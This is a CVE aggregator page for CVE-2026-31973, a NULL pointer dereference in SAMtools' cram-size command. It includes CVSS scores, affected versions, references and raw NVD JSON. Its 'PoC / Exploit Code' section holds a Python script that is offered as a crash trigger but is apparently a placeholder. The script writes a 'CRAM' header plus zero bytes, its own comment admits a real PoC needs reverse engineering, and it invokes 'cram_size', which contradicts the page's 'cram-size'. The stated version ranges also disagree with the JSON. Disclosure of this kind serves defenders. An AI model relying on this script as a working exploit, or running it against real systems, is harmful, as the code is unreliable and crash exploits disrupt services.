CVE-2026-31973

Description

SAMtools is a program for reading, manipulating and writing bioinformatics file formats. Starting in version 1.17, in the cram-size command, used to write information about how well CRAM files are compressed, a check to see if the `cram_decode_compression_header()` was missing. If the function returned an error, this could lead to a NULL pointer dereference. Exploiting this bug causes a NULL pointer dereference. Typically this will cause the program to crash. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:samtools:samtools:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:samtools:samtools:1.23:*:*:*:*:*:*:* - VULNERABLE

SAMtools 1.17 <= version < 1.21.1

SAMtools 1.17 <= version < 1.22.2

SAMtools 1.17 <= version < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC概念验证 - 触发SAMtools NULL指针解引用
# 此PoC仅用于安全研究和漏洞测试
# 使用方法：samtools cram_size malicious.cram

# 构造触发漏洞的CRAM文件（十六进制表示）
# 实际PoC需要逆向分析CRAM格式并构造特定数据

import struct

def generate_poc_cram():
    """生成触发CVE-2026-31973的CRAM测试文件"""
    # CRAM文件头部
    header = b'CRAM'  # Magic number
    header += struct.pack('>I', 3)  # Version 3
    header += struct.pack('>I', 1000)  # File ID
    
    # 构造压缩容器 - 触发cram_decode_compression_header()错误
    container = bytearray()
    container += b'\x00' * 50  # 填充数据
    
    with open('poc.cram', 'wb') as f:
        f.write(header + container)
    
    print('PoC file generated: poc.cram')
    print('执行: samtools cram_size poc.cram')

if __name__ == '__main__':
    generate_poc_cram()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31973
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31973
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31973/
[4] VulDB https://vuldb.com/cve/CVE-2026-31973
[5] https://github.com/samtools/samtools/commit/06fc2a219b3d7c94d3f412c09f6d1efd51199f2f
[6] https://github.com/samtools/samtools/security/advisories/GHSA-x86f-q6fj-cm43
[7] http://www.openwall.com/lists/oss-security/2026/03/18/12

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31973", "sourceIdentifier": "[email protected]", "published": "2026-03-18T21:16:26.250", "lastModified": "2026-03-19T18:48:10.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAMtools is a program for reading, manipulating and writing bioinformatics file formats. Starting in version 1.17, in the cram-size command, used to write information about how well CRAM files are compressed, a check to see if the `cram_decode_compression_header()` was missing. If the function returned an error, this could lead to a NULL pointer dereference. Exploiting this bug causes a NULL pointer dereference. Typically this will cause the program to crash. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "SAMtools es un programa para leer, manipular y escribir formatos de archivo bioinformáticos. A partir de la versión 1.17, en el comando cram-size, utilizado para escribir información sobre qué tan bien se comprimen los archivos CRAM, se omitió una comprobación para ver si 'cram_decode_compression_header()' estaba ausente. Si la función devolvía un error, esto podría llevar a una desreferenciación de puntero NULL. Explotar este error causa una desreferenciación de puntero NULL. Típicamente, esto hará que el programa falle. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay una solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samtools:samtools:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.17", "versionEndIncluding": "1.21.1", "matchCriteriaId": "2AAB5401-9187-4F27-A463-B52558DE6D9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:samtools:samtools:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.22", "versionEndExcluding": "1.22.2", "matchCriteriaId": "AD12CAC6-5A57-435F-991C-FFA0DB2F3400"}, {"vulnerable": true, "criteria": "cpe:2.3:a:samtools:samtools:1.23:*:*:*:*:*:*:*", "matchCriteriaId": "7FAB480A-76D2-4850-B9D0-4D7F9C32B8C4"}]}]}], "references": [{"url": "https://github.com/samtools/samtools/commit/06fc2a219b3d7c94d3f412c09f6d1efd51199f2f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/samtools/samtools/security/advisories/GHSA-x86f-q6fj-cm43", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/18/12", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}